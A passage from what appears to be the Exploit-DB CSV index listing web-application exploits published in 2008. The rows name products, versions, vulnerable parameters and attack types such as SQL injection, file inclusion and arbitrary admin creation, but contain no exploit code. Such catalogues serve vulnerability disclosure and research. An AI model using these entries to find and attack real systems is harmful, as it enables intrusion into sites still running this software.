Injection",2008-05-07,Cod3rZ,php,webapps, -5558,exploits/php/webapps/5558.txt,"CMS Faethon 2.2 Ultimate - Remote File Inclusion / Cross-Site Scripting",2008-05-07,RoMaNcYxHaCkEr,php,webapps, -5559,exploits/php/webapps/5559.txt,"EZContents CMS 2.0.0 - Multiple SQL Injections",2008-05-07,"Virangar Security",php,webapps, -5560,exploits/php/webapps/5560.txt,"MusicBox 2.3.7 - 'artistId' SQL Injection",2008-05-07,HaCkeR_EgY,php,webapps, -5562,exploits/php/webapps/5562.py,"RunCMS 1.6.1 - 'msg_image' SQL Injection",2008-05-08,The:Paradox,php,webapps, -5564,exploits/asp/webapps/5564.txt,"Shader TV (Beta) - Multiple SQL Injections",2008-05-08,U238,asp,webapps, -5565,exploits/php/webapps/5565.pl,"vShare YouTube Clone 2.6 - 'tid' SQL Injection",2008-05-08,Saime,php,webapps, -5566,exploits/php/webapps/5566.txt,"SazCart 1.5.1 - Multiple Remote File Inclusions",2008-05-08,RoMaNcYxHaCkEr,php,webapps, -5567,exploits/php/webapps/5567.txt,"Cyberfolio 7.12 - 'rep' Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps, -5568,exploits/php/webapps/5568.txt,"miniBloggie 1.0 - 'del.php' Arbitrary Delete Post",2008-05-08,Cod3rZ,php,webapps, -5575,exploits/php/webapps/5575.txt,"Admidio 1.4.8 - 'getfile.php' Remote File Disclosure",2008-05-09,n3v3rh00d,php,webapps, -5576,exploits/php/webapps/5576.pl,"SazCart 1.5.1 - 'prodid' SQL Injection",2008-05-09,JosS,php,webapps, -5577,exploits/php/webapps/5577.txt,"HispaH Model Search - 'cat.php?cat' SQL Injection",2008-05-09,InjEctOr5,php,webapps, -5578,exploits/php/webapps/5578.txt,"Phoenix View CMS Pre Alpha2 - SQL Injection / Local File Inclusion / Cross-Site Scripting",2008-05-09,tw8,php,webapps, -5579,exploits/php/webapps/5579.html,"txtCMS 0.3 - 'index.php' Local File Inclusion",2008-05-09,cOndemned,php,webapps, -5580,exploits/php/webapps/5580.txt,"Ktools Photostore 3.5.1 - 'gid' SQL Injection",2008-05-09,Mr.SQL,php,webapps, -5581,exploits/php/webapps/5581.txt,"Advanced Links Management (ALM) 1.52 - SQL Injection",2008-05-10,His0k4,php,webapps, -5582,exploits/php/webapps/5582.txt,"Ktools Photostore 3.5.2 - Multiple SQL Injections",2008-05-10,DNX,php,webapps, -5583,exploits/php/webapps/5583.php,"Joomla! Component Datsogallery 1.6 - Blind SQL Injection",2008-05-10,+toxa+,php,webapps, -5586,exploits/php/webapps/5586.txt,"PhpBlock a8.5 - Multiple Remote File Inclusions",2008-05-11,CraCkEr,php,webapps, -5587,exploits/php/webapps/5587.pl,"Joomla! Component xsstream-dm 0.01b - SQL Injection",2008-05-11,Houssamix,php,webapps, -5588,exploits/php/webapps/5588.php,"QuickUpCMS - Multiple SQL Injections Vulnerabilities",2008-05-11,Lidloses_Auge,php,webapps, -5589,exploits/php/webapps/5589.php,"Vortex CMS - 'pageid' Blind SQL Injection",2008-05-11,Lidloses_Auge,php,webapps, -5590,exploits/php/webapps/5590.txt,"AJ Article 1.0 - 'featured_article.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps, -5591,exploits/php/webapps/5591.txt,"AJ Auction 6.2.1 - 'classifide_ad.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps, -5592,exploits/php/webapps/5592.txt,"AJ Classifieds 2008 - 'index.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps, -5594,exploits/php/webapps/5594.txt,"ZeusCart 2.0 - 'category_list.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps, -5595,exploits/php/webapps/5595.txt,"ClanLite 2.x - SQL Injection / Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps, -5596,exploits/php/webapps/5596.txt,"BigACE 2.4 - Multiple Remote File Inclusions",2008-05-12,BiNgZa,php,webapps, -5597,exploits/php/webapps/5597.pl,"Battle.net Clan Script 1.5.x - SQL Injection",2008-05-12,Stack,php,webapps, -5598,exploits/php/webapps/5598.txt,"Mega File Hosting Script 1.2 - 'fid' SQL Injection",2008-05-12,TurkishWarriorr,php,webapps, -5599,exploits/php/webapps/5599.txt,"PHP Classifieds Script 05122008 - SQL Injection",2008-05-12,InjEctOr5,php,webapps, -5600,exploits/php/webapps/5600.php,"CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload",2008-05-12,EgiX,php,webapps, -5601,exploits/php/webapps/5601.pl,"Advanced Image Hosting (AIH) 2.1 - SQL Injection",2008-05-12,Stack,php,webapps, -5602,exploits/php/webapps/5602.txt,"AJ HYIP ACME - 'topic_detail.php' SQL Injection",2008-05-12,InjEctOr5,php,webapps, -5603,exploits/php/webapps/5603.txt,"EQdkp 1.3.2f - 'user_id' Authentication Bypass (PoC)",2008-05-13,vortfu,php,webapps, -5604,exploits/php/webapps/5604.txt,"e107 Plugin BLOG Engine 2.2 - 'rid' Blind SQL Injection",2008-05-13,Saime,php,webapps, -5605,exploits/php/webapps/5605.txt,"e-107 Plugin ZoGo-Shop 1.16 Beta 13 - SQL Injection",2008-05-13,Cr@zy_King,php,webapps, -5606,exploits/php/webapps/5606.txt,"Web Group Communication Center (WGCC) 1.0.3 - SQL Injection",2008-05-13,myvx,php,webapps, -5607,exploits/php/webapps/5607.txt,"CaLogic Calendars 1.2.2 - 'langsel' SQL Injection",2008-05-13,His0k4,php,webapps, -5608,exploits/asp/webapps/5608.txt,"Meto Forum 1.1 - Multiple SQL Injections",2008-05-13,U238,asp,webapps, -5609,exploits/php/webapps/5609.txt,"EMO Realty Manager - 'ida' SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps, -5610,exploits/php/webapps/5610.txt,"The Real Estate Script - 'docID' SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps, -5611,exploits/php/webapps/5611.txt,"Linkspile - 'cat_id' SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps, -5613,exploits/php/webapps/5613.txt,"Freelance Auction Script 1.0 - 'browseproject.php' SQL Injection",2008-05-14,t0pP8uZz,php,webapps, -5614,exploits/php/webapps/5614.txt,"Feedback and Rating Script 1.0 - 'detail.php' SQL Injection",2008-05-14,t0pP8uZz,php,webapps, -5615,exploits/php/webapps/5615.txt,"AS-GasTracker 1.0.0 - Insecure Cookie Handling",2008-05-14,t0pP8uZz,php,webapps, -5616,exploits/php/webapps/5616.txt,"ActiveKB 1.5 - Insecure Cookie Handling/Arbitrary Admin Access",2008-05-14,t0pP8uZz,php,webapps, -5617,exploits/php/webapps/5617.txt,"Internet PhotoShow (Special Edition) - Insecure Cookie Handling",2008-05-14,t0pP8uZz,php,webapps, -5618,exploits/php/webapps/5618.txt,"Lanius CMS 1.2.16 - 'FCKeditor' Arbitrary File Upload",2008-05-14,EgiX,php,webapps, -5620,exploits/php/webapps/5620.txt,"rgboard 3.0.12 - Remote File Inclusioni / Cross-Site Scripting",2008-05-14,e.wiZz!,php,webapps, -5621,exploits/php/webapps/5621.txt,"Kostenloses Linkmanagementscript - Remote File Inclusion",2008-05-14,HaCkeR_EgY,php,webapps, -5623,exploits/php/webapps/5623.txt,"Kostenloses Linkmanagementscript - SQL Injection",2008-05-15,"Virangar Security",php,webapps, -5624,exploits/php/webapps/5624.txt,"newsmanager 2.0 - Remote File Inclusion / File Disclosure / SQL Injection",2008-05-15,GoLd_M,php,webapps, -5626,exploits/php/webapps/5626.txt,"68 Classifieds 4.0 - 'category.php' SQL Injection",2008-05-15,HaCkeR_EgY,php,webapps, -5627,exploits/php/webapps/5627.pl,"Pet Grooming Management System 2.0 - Arbitrary Add Admin",2008-05-15,t0pP8uZz,php,webapps, -5628,exploits/php/webapps/5628.txt,"RantX 1.0 - Insecure Admin Authentication",2008-05-15,t0pP8uZz,php,webapps, -5629,exploits/php/webapps/5629.txt,"Web Slider 0.6 - Insecure Cookie/Authentication Handling",2008-05-15,t0pP8uZz,php,webapps, -5630,exploits/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 - Insecure Cookie Handling",2008-05-15,t0pP8uZz,php,webapps, -5631,exploits/php/webapps/5631.txt,"IMGallery 2.5 - Multiple SQL Injections",2008-05-15,cOndemned,php,webapps, -5633,exploits/asp/webapps/5633.pl,"StanWeb.CMS - SQL Injection",2008-05-16,JosS,asp,webapps, -5634,exploits/php/webapps/5634.html,"Zomplog 3.8.2 - 'newuser.php' Arbitrary Add Admin",2008-05-16,ArxWolf,php,webapps, -5635,exploits/php/webapps/5635.pl,"Archangel Weblog 0.90.02 - 'post_id' SQL Injection",2008-05-16,Stack,php,webapps, -5636,exploits/php/webapps/5636.txt,"Zomplog 3.8.2 - 'force_download.php' File Disclosure",2008-05-16,Stack,php,webapps, -5637,exploits/php/webapps/5637.txt,"WR-Meeting 1.0 - 'msnum' Local File Disclosure",2008-05-17,Cr@zy_King,php,webapps, -5638,exploits/php/webapps/5638.txt,"How2ASP.net WebBoard 4.1 - SQL Injection",2008-05-17,"CWH Underground",php,webapps, -5639,exploits/php/webapps/5639.pl,"FicHive 1.0 - 'category' Blind SQL Injection",2008-05-17,His0k4,php,webapps, -5640,exploits/php/webapps/5640.py,"Smeego 1.0 - 'Cookie lang' Local File Inclusion",2008-05-17,0in,php,webapps, -5641,exploits/php/webapps/5641.txt,"CMS WebManager-Pro - Multiple SQL Injections",2008-05-18,dun,php,webapps, -5642,exploits/php/webapps/5642.txt,"TAGWORX.CMS 3.00.02 - Multiple SQL Injections",2008-05-18,dun,php,webapps, -5643,exploits/php/webapps/5643.txt,"Ajax Framework - 'lang' Local File Inclusion",2008-05-18,dun,php,webapps, -5644,exploits/php/webapps/5644.txt,"Lulieblog 1.2 - Multiple Vulnerabilities",2008-05-18,Cod3rZ,php,webapps, -5645,exploits/php/webapps/5645.txt,"AlkalinePHP 0.77.35 - 'adduser.php' Arbitrary Add Admin",2008-05-18,t0pP8uZz,php,webapps, -5646,exploits/php/webapps/5646.txt,"Easycms 0.4.2 - Multiple Vulnerabilities",2008-05-18,t0pP8uZz,php,webapps, -5647,exploits/php/webapps/5647.txt,"GNU/Gallery 1.1.1.0 - 'admin.php' Local File Inclusion",2008-05-18,t0pP8uZz,php,webapps, -5648,exploits/php/webapps/5648.pl,"MeltingIce File System 1.0 - Arbitrary Add User",2008-05-18,t0pP8uZz,php,webapps, -5649,exploits/php/webapps/5649.pl,"PHP-AGTC Membership System 1.1a - Arbitrary Add Admin",2008-05-18,t0pP8uZz,php,webapps, -5650,exploits/php/webapps/5650.pl,"MyPicGallery 1.0 - Arbitrary Add Admin",2008-05-18,t0pP8uZz,php,webapps, -5651,exploits/php/webapps/5651.txt,"microssys CMS 1.5 - Remote File Inclusion",2008-05-19,Raz0r,php,webapps, -5652,exploits/php/webapps/5652.pl,"AlkalinePHP 0.80.00 Beta - 'thread.php' SQL Injection",2008-05-19,Stack,php,webapps, -5653,exploits/php/webapps/5653.php,"MercuryBoard 1.1.5 - 'login.php' Blind SQL Injection",2008-05-19,EgiX,php,webapps, -5654,exploits/php/webapps/5654.txt,"EntertainmentScript 1.4.0 - 'play.php' SQL Injection",2008-05-19,Mr.SQL,php,webapps, -5655,exploits/php/webapps/5655.pl,"EntertainmentScript 1.4.0 - 'page.php' Local File Inclusion",2008-05-20,Stack,php,webapps, -5656,exploits/php/webapps/5656.txt,"eCMS 0.4.2 - SQL Injection / Security Bypass",2008-05-20,"Virangar Security",php,webapps, -5657,exploits/php/webapps/5657.txt,"Mantis Bug Tracker 1.1.1 - Code Execution / Cross-Site Scripting / Cross-Site Request Forgery",2008-05-20,USH,php,webapps, -5658,exploits/php/webapps/5658.txt,"ComicShout 2.5 - 'comic_id' SQL Injection",2008-05-20,Niiub,php,webapps, -5659,exploits/php/webapps/5659.txt,"MX-System 2.7.3 - 'index.php' SQL Injection",2008-05-20,cOndemned,php,webapps, -5660,exploits/php/webapps/5660.txt,"PHP Jokesite 2.0 - 'cat_id' SQL Injection",2008-05-20,InjEctOr5,php,webapps, -5661,exploits/php/webapps/5661.txt,"Netious CMS 0.4 - 'pageid' SQL Injection",2008-05-21,InjEctOr5,php,webapps, -5662,exploits/cgi/webapps/5662.txt,"Alcatel OmniPCX Office 210/061.1 - Remote Command Execution",2008-05-21,DSecRG,cgi,webapps, -5663,exploits/php/webapps/5663.txt,"6rbScript - 'news.php' SQL Injection",2008-05-21,"Hussin X",php,webapps, -5664,exploits/php/webapps/5664.txt,"Weblosninger 4 - Cross-Site Scripting / SQL Injection",2008-05-21,Mr.SQL,php,webapps, -5665,exploits/php/webapps/5665.txt,"Netbutikker 4 - SQL Injection",2008-05-21,Mr.SQL,php,webapps, -5666,exploits/php/webapps/5666.txt,"e107 Plugin BLOG Engine 2.2 - 'uid' Blind SQL Injection",2008-05-22,"Virangar Security",php,webapps, -5668,exploits/php/webapps/5668.txt,"Quate CMS 0.3.4 - Multiple Vulnerabilities",2008-05-23,DSecRG,php,webapps, -5669,exploits/php/webapps/5669.txt,"OneCMS 2.5 - 'install_mod.php' Local File Inclusion",2008-05-23,DSecRG,php,webapps, -5670,exploits/php/webapps/5670.txt,"RoomPHPlanning 1.5 - 'idresa' SQL Injection",2008-05-24,His0k4,php,webapps, -5671,exploits/php/webapps/5671.txt,"PHPRaider 1.0.7 - 'PHPbb3.functions.php' Remote File Inclusion",2008-05-24,Kacak,php,webapps, -5672,exploits/php/webapps/5672.txt,"plusphp url shortening software 1.6 - Remote File Inclusion",2008-05-25,DR.TOXIC,php,webapps, -5673,exploits/php/webapps/5673.txt,"Xomol CMS 1.2 - Authentication Bypass / Local File Inclusion",2008-05-25,DNX,php,webapps, -5674,exploits/php/webapps/5674.txt,"RoomPHPlanning 1.5 - Arbitrary Add Admin",2008-05-26,Stack,php,webapps, -5675,exploits/php/webapps/5675.txt,"RoomPHPlanning 1.5 - Multiple SQL Injections",2008-05-26,"Virangar Security",php,webapps, -5676,exploits/php/webapps/5676.txt,"CMS MAXSITE 1.10 - 'category' SQL Injection",2008-05-26,Tesz,php,webapps, -5677,exploits/php/webapps/5677.txt,"RevokeBB 1.0 RC11 - 'Search' SQL Injection",2008-05-27,The:Paradox,php,webapps, -5678,exploits/php/webapps/5678.txt,"CKGold Shopping Cart 2.5 - 'category_id' SQL Injection",2008-05-27,Cr@zy_King,php,webapps, -5680,exploits/php/webapps/5680.txt,"OtomiGen.x 2.2 - 'lang' Local File Inclusion",2008-05-27,Saime,php,webapps, -5683,exploits/php/webapps/5683.txt,"PHPhotoalbum 0.5 - Multiple SQL Injections",2008-05-28,cOndemned,php,webapps, -5684,exploits/php/webapps/5684.txt,"Joomla! Component Artist - 'idgalery' SQL Injection",2008-05-28,Cr@zy_King,php,webapps, -5685,exploits/php/webapps/5685.txt,"FlashBlog - 'articulo_id' SQL Injection",2008-05-28,HER0,php,webapps, -5688,exploits/php/webapps/5688.php,"SyntaxCMS 1.3 - 'FCKeditor' Arbitrary File Upload",2008-05-29,Stack,php,webapps, -5689,exploits/php/webapps/5689.txt,"AirvaeCommerce 3.0 - 'pid' SQL Injection",2008-05-29,QTRinux,php,webapps, -5690,exploits/php/webapps/5690.txt,"PicoFlat CMS 0.5.9 (Windows) - Local File Inclusion",2008-05-29,gmda,php,webapps, -5691,exploits/php/webapps/5691.php,"CMS from Scratch 1.1.3 - 'FCKeditor' Arbitrary File Upload",2008-05-29,EgiX,php,webapps, -5692,exploits/php/webapps/5692.pl,"Mambo Component mambads 1.0 RC1 Beta - SQL Injection",2008-05-29,Houssamix,php,webapps, -5693,exploits/php/webapps/5693.txt,"CMS from Scratch 1.1.3 - 'image.php' Directory Traversal",2008-05-29,Stack,php,webapps, -5696,exploits/php/webapps/5696.pl,"phpBookingCalendar 10 d - SQL Injection",2008-05-29,Stack,php,webapps, -5697,exploits/php/webapps/5697.php,"PHP Booking Calendar 10 d - 'FCKeditor' Arbitrary File Upload",2008-05-29,Stack,php,webapps, -5698,exploits/php/webapps/5698.txt,"HiveMaker Professional 1.0.2 - 'cid' SQL Injection",2008-05-30,K-159,php,webapps, -5699,exploits/php/webapps/5699.txt,"PsychoStats 2.3.3 - Multiple SQL Injections",2008-05-31,Mr.SQL,php,webapps, -5700,exploits/php/webapps/5700.html,"CMSimple 3.1 - Local File Inclusion / Arbitrary File Upload",2008-05-31,irk4z,php,webapps, -5701,exploits/php/webapps/5701.txt,"Social Site Generator 2.0 - 'sgc_id' SQL Injection",2008-05-31,"DeAr Ev!L",php,webapps, -5702,exploits/php/webapps/5702.txt,"Azuresites CMS - Multiple Vulnerabilities",2008-05-31,Lidloses_Auge,php,webapps, -5703,exploits/php/webapps/5703.txt,"PHP Visit Counter 0.4 - 'datespan' SQL Injection",2008-05-31,Lidloses_Auge,php,webapps, -5704,exploits/php/webapps/5704.txt,"PassWiki 0.9.16 RC3 - 'site_id' Local File Inclusion",2008-05-31,mozi,php,webapps, -5705,exploits/asp/webapps/5705.txt,"BP Blog 6.0 - 'id' Blind SQL Injection",2008-05-31,JosS,asp,webapps, -5706,exploits/php/webapps/5706.php,"EasyWay CMS - 'mid' SQL Injection",2008-05-31,Lidloses_Auge,php,webapps, -5707,exploits/php/webapps/5707.txt,"Social Site Generator 2.0 - 'path' Remote File Inclusion",2008-05-31,vBmad,php,webapps, -5708,exploits/php/webapps/5708.txt,"Joomla! Component prayercenter 1.4.9 - 'id' SQL Injection",2008-05-31,His0k4,php,webapps, -5710,exploits/php/webapps/5710.pl,"Joomla! Component Bible Study 1.5.0 - 'id' SQL Injection",2008-05-31,Stack,php,webapps, -5711,exploits/php/webapps/5711.txt,"Social Site Generator 2.0 - Multiple Remote File Disclosure Vulnerabilities",2008-06-01,Stack,php,webapps, -5713,exploits/php/webapps/5713.txt,"ComicShout 2.8 - 'news_id' SQL Injection",2008-06-01,JosS,php,webapps, -5714,exploits/php/webapps/5714.pl,"Joomla! Component MyContent 1.1.13 - Blind SQL Injection",2008-06-01,His0k4,php,webapps, -5715,exploits/php/webapps/5715.txt,"DesktopOnNet 3 Beta - Multiple Remote File Inclusions",2008-06-01,MK,php,webapps, -5716,exploits/php/webapps/5716.txt,"mebiblio 0.4.7 - SQL Injection / Arbitrary File Upload / Cross-Site Scripting",2008-06-01,"CWH Underground",php,webapps, -5717,exploits/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store 1.3 Beta - SQL Injection",2008-06-01,KnocKout,asp,webapps, -5719,exploits/php/webapps/5719.pl,"Joomla! Component JooBB 0.5.9 - Blind SQL Injection",2008-06-01,His0k4,php,webapps, -5721,exploits/php/webapps/5721.pl,"Joomla! Component acctexp 0.12.x - Blind SQL Injection",2008-06-02,His0k4,php,webapps, -5722,exploits/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusions",2008-06-02,HaiHui,php,webapps, -5723,exploits/php/webapps/5723.txt,"Joomla! Component equotes 0.9.4 - SQL Injection",2008-06-02,His0k4,php,webapps, -5724,exploits/php/webapps/5724.txt,"PLog 1.0.6 - 'albumID' SQL Injection",2008-06-02,DreamTurk,php,webapps, -5725,exploits/php/webapps/5725.txt,"smeweb 1.4b - SQL Injection / Cross-Site Scripting",2008-06-02,"CWH Underground",php,webapps, -5728,exploits/php/webapps/5728.txt,"FlashBlog 0.31b - Arbitrary File Upload",2008-06-03,"ilker Kandemir",php,webapps, -5729,exploits/php/webapps/5729.txt,"Joomla! Component JoomRadio 1.0 - 'id' SQL Injection",2008-06-03,His0k4,php,webapps, -5730,exploits/php/webapps/5730.txt,"Joomla! Component iDoBlog b24 - SQL Injection",2008-06-03,His0k4,php,webapps, -5731,exploits/php/webapps/5731.txt,"Battle Blog 1.25 - 'comment.asp' SQL Injection",2008-06-03,Bl@ckbe@rD,php,webapps, -5733,exploits/php/webapps/5733.txt,"QuickerSite 1.8.5 - Multiple Vulnerabilities",2008-06-03,BugReport.IR,php,webapps, -5734,exploits/php/webapps/5734.pl,"Joomla! Component JooBlog 0.1.1 - Blind SQL Injection",2008-06-03,His0k4,php,webapps, -5736,exploits/php/webapps/5736.txt,"1Book Guestbook Script 1.0.1 - Code Execution",2008-06-03,JIKO,php,webapps, -5737,exploits/php/webapps/5737.pl,"Joomla! Component Jotloader 1.2.1.a - Blind SQL Injection",2008-06-04,His0k4,php,webapps, -5739,exploits/php/webapps/5739.txt,"PHP-Address Book 3.1.5 - SQL Injection / Cross-Site Scripting",2008-06-04,"CWH Underground",php,webapps, -5740,exploits/php/webapps/5740.pl,"Joomla! Component EasyBook 1.1 - 'gbid' SQL Injection",2008-06-04,ZAMUT,php,webapps, -5742,exploits/php/webapps/5742.txt,"427bb 2.3.1 - SQL Injection / Cross-Site Scripting",2008-06-05,"CWH Underground",php,webapps, -5743,exploits/php/webapps/5743.txt,"Joomla! Component SimpleShop 3.4 - SQL Injection",2008-06-05,His0k4,php,webapps, -5744,exploits/php/webapps/5744.txt,"Power Phlogger 2.2.5 - 'css_str' SQL Injection",2008-06-05,MustLive,php,webapps, -5745,exploits/php/webapps/5745.txt,"pSys 0.7.0.a - 'shownews' SQL Injection",2008-06-05,anonymous,php,webapps, -5748,exploits/php/webapps/5748.txt,"Joomla! Component JoomlaDate 1.2 - 'user' SQL Injection",2008-06-05,His0k4,php,webapps, -5752,exploits/php/webapps/5752.pl,"Joomla! Component GameQ 4.0 - SQL Injection",2008-06-07,His0k4,php,webapps, -5753,exploits/asp/webapps/5753.txt,"JiRo's FAQ Manager eXperience 1.0 - 'fID' SQL Injection",2008-06-08,Zigma,asp,webapps, -5754,exploits/php/webapps/5754.txt,"phpinv 0.8.0 - Local File Inclusion / Cross-Site Scripting",2008-06-08,"CWH Underground",php,webapps, -5755,exploits/php/webapps/5755.pl,"Joomla! Component yvComment 1.16 - Blind SQL Injection",2008-06-08,His0k4,php,webapps, -5756,exploits/php/webapps/5756.txt,"XOOPS Module Uploader 1.1 - 'Filename' File Disclosure",2008-06-08,MEEKAAH,php,webapps, -5757,exploits/php/webapps/5757.txt,"BrowserCRM 5.002.00 - 'clients.php' Remote File Inclusion",2008-06-08,ahmadbady,php,webapps, -5758,exploits/php/webapps/5758.txt,"Galatolo Web Manager 1.0 - Cross-Site Scripting / Local File Inclusion",2008-06-08,StAkeR,php,webapps, -5759,exploits/php/webapps/5759.txt,"Joomla! Component Rapid Recipe 1.6.6/1.6.7 - SQL Injection",2008-06-08,His0k4,php,webapps, -5760,exploits/php/webapps/5760.pl,"Galatolo Web Manager 1.0 - SQL Injection",2008-06-09,Stack,php,webapps, -5761,exploits/php/webapps/5761.pl,"Joomla! Component iJoomla News Portal 1.0 - 'itemID' SQL Injection",2008-06-09,"ilker Kandemir",php,webapps, -5762,exploits/php/webapps/5762.txt,"ProManager 0.73 - 'config.php' Local File Inclusion",2008-06-09,Stack,php,webapps, -5763,exploits/asp/webapps/5763.txt,"real estate Web site 1.0 - SQL Injection / Cross-Site Scripting",2008-06-09,JosS,asp,webapps, -5764,exploits/php/webapps/5764.txt,"Telephone Directory 2008 - SQL Injection / Cross-Site Scripting",2008-06-09,"CWH Underground",php,webapps, -5765,exploits/asp/webapps/5765.txt,"ASPilot Pilot Cart 7.3 - 'article' SQL Injection",2008-06-09,Bl@ckbe@rD,asp,webapps, -5766,exploits/php/webapps/5766.txt,"realm CMS 2.3 - Multiple Vulnerabilities",2008-06-09,BugReport.IR,php,webapps, -5767,exploits/php/webapps/5767.php,"Flux CMS 1.5.0 - 'loadsave.php' Arbitrary File Overwrite",2008-06-09,EgiX,php,webapps, -5768,exploits/php/webapps/5768.txt,"pNews 2.08 - 'shownews' SQL Injection",2008-06-09,Cr@zy_King,php,webapps, -5769,exploits/php/webapps/5769.pl,"Telephone Directory 2008 - Arbitrary Delete Contact",2008-06-09,Stack,php,webapps, -5770,exploits/php/webapps/5770.php,"Achievo 1.3.2 - 'FCKeditor' Arbitrary File Upload",2008-06-09,EgiX,php,webapps, -5771,exploits/php/webapps/5771.txt,"ErfurtWiki R1.02b - Local File Inclusion",2008-06-10,Unohope,php,webapps, -5772,exploits/php/webapps/5772.txt,"DCFM Blog 0.9.4 - SQL Injection",2008-06-10,Unohope,php,webapps, -5773,exploits/php/webapps/5773.txt,"Yblog 0.2.2.2 - Cross-Site Scripting / SQL Injection",2008-06-10,Unohope,php,webapps, -5774,exploits/php/webapps/5774.txt,"Insanely Simple Blog 0.5 - SQL Injection",2008-06-10,Unohope,php,webapps, -5775,exploits/asp/webapps/5775.txt,"ASPPortal Free Version - 'Topic_Id' SQL Injection",2008-06-10,JosS,asp,webapps, -5776,exploits/php/webapps/5776.txt,"Experts 1.0.0 - 'answer.php' SQL Injection",2008-06-10,"CWH Underground",php,webapps, -5779,exploits/php/webapps/5779.txt,"SyndeoCMS 2.6.0 - Local File Inclusion / Cross-Site Scripting",2008-06-10,"CWH Underground",php,webapps, -5780,exploits/asp/webapps/5780.txt,"ASP Download 1.03 - Arbitrary Change Administrator Account",2008-06-10,Zigma,asp,webapps, -5781,exploits/asp/webapps/5781.txt,"Todd Woolums ASP News Management 2.2 - SQL Injection",2008-06-10,Bl@ckbe@rD,asp,webapps, -5782,exploits/php/webapps/5782.txt,"TNT Forum 0.9.4 - Local File Inclusion",2008-06-10,"CWH Underground",php,webapps, -5783,exploits/php/webapps/5783.txt,"Yuhhu 2008 SuperStar - 'board' SQL Injection",2008-06-10,RMx,php,webapps, -5784,exploits/php/webapps/5784.txt,"FOG Forum 0.8.1 - Multiple Local File Inclusions",2008-06-11,"CWH Underground",php,webapps, -5785,exploits/php/webapps/5785.txt,"eFiction 3.0 - 'toplists.php' SQL Injection",2008-06-11,Mr.SQL,php,webapps, -5786,exploits/php/webapps/5786.txt,"IPTBB 0.5.6 - Arbitrary Add Admin",2008-06-11,"CWH Underground",php,webapps, -5787,exploits/php/webapps/5787.txt,"MycroCMS 0.5 - Blind SQL Injection",2008-06-11,"CWH Underground",php,webapps, -5788,exploits/php/webapps/5788.txt,"Pooya Site Builder (PSB) 6.0 - Multiple SQL Injections",2008-06-11,BugReport.IR,php,webapps, -5789,exploits/php/webapps/5789.pl,"JAMM CMS - 'id' Blind SQL Injection",2008-06-11,anonymous,php,webapps, -5791,exploits/php/webapps/5791.txt,"Gravity Board X 2.0 Beta - SQL Injection / Cross-Site Scripting",2008-06-12,"CWH Underground",php,webapps, -5792,exploits/php/webapps/5792.txt,"Facil-CMS 0.1RC - Multiple Local File Inclusions",2008-06-12,"CWH Underground",php,webapps, -5794,exploits/php/webapps/5794.pl,"Clever Copy 3.0 - 'results.php' SQL Injection",2008-06-12,anonymous,php,webapps, -5796,exploits/php/webapps/5796.php,"GLLCTS2 < 4.2.4 - 'detail' SQL Injection",2008-06-12,TheDefaced,php,webapps, -5797,exploits/php/webapps/5797.txt,"Butterfly ORGanizer 2.0.0 - SQL Injection / Cross-Site Scripting",2008-06-13,"CWH Underground",php,webapps, -5798,exploits/php/webapps/5798.pl,"WebChamado 1.1 - Arbitrary Add Admin",2008-06-13,"CWH Underground",php,webapps, -5799,exploits/php/webapps/5799.pl,"Mambo Component Galleries 1.0 - 'aid' SQL Injection",2008-06-13,Houssamix,php,webapps, -5800,exploits/php/webapps/5800.pl,"Butterfly ORGanizer 2.0.0 - Arbitrary Delete (Category/Account)",2008-06-13,Stack,php,webapps, -5801,exploits/php/webapps/5801.txt,"Easy-Clanpage 3.0b1 - 'section' Local File Inclusion",2008-06-13,Loader007,php,webapps, -5802,exploits/php/webapps/5802.txt,"WebChamado 1.1 - 'tsk_id' SQL Injection",2008-06-13,"Virangar Security",php,webapps, -5803,exploits/php/webapps/5803.txt,"Pre News Manager 1.0 - 'id' SQL Injection",2008-06-13,K-159,php,webapps, -5804,exploits/php/webapps/5804.txt,"Pre ADS Portal 2.0 - SQL Injection",2008-06-13,K-159,php,webapps, -5805,exploits/asp/webapps/5805.txt,"E-Smart Cart - 'productsofcat.asp' SQL Injection",2008-06-13,JosS,asp,webapps, -5806,exploits/php/webapps/5806.pl,"GLLCTS2 - 'sort' Blind SQL Injection",2008-06-13,anonymous,php,webapps, -5807,exploits/php/webapps/5807.txt,"PHP JOBWEBSITE PRO - 'JobSearch3.php' SQL Injection",2008-06-13,JosS,php,webapps, -5808,exploits/php/webapps/5808.txt,"Mambo 4.6.4 - 'Output.php' Remote File Inclusion",2008-06-13,irk4z,php,webapps, -5809,exploits/php/webapps/5809.txt,"Pre Job Board - 'JobSearch.php' SQL Injection",2008-06-14,JosS,php,webapps, -5810,exploits/php/webapps/5810.txt,"Contenido 4.8.4 - Remote File Inclusion / Cross-Site Scripting",2008-06-14,RoMaNcYxHaCkEr,php,webapps, -5811,exploits/php/webapps/5811.txt,"Family Connections CMS 1.4 - Multiple SQL Injections",2008-06-14,"CWH Underground",php,webapps, -5812,exploits/php/webapps/5812.txt,"PHPMyCart 1.3 - 'cat' SQL Injection",2008-06-14,anonymous,php,webapps, -5813,exploits/php/webapps/5813.txt,"SHOUTcast Admin Panel 2.0 - 'page' Local File Inclusion",2008-06-14,"CWH Underground",php,webapps, -5815,exploits/php/webapps/5815.pl,"Cartweaver 3 - 'prodId' Blind SQL Injection",2008-06-14,anonymous,php,webapps, -5816,exploits/php/webapps/5816.pl,"DIY - 'did' Blind SQL Injection",2008-06-14,Mr.SQL,php,webapps, -5818,exploits/php/webapps/5818.txt,"xeCMS 1.0.0 RC2 - Insecure Cookie Handling",2008-06-14,t0pP8uZz,php,webapps, -5819,exploits/php/webapps/5819.txt,"ezcms 1.2 - Blind SQL Injection / Authentication Bypass",2008-06-14,t0pP8uZz,php,webapps, -5820,exploits/php/webapps/5820.txt,"PHPEasyNews 1.13 RC2 - 'POST' SQL Injection",2008-06-14,t0pP8uZz,php,webapps, -5821,exploits/php/webapps/5821.txt,"Alstrasoft AskMe Pro 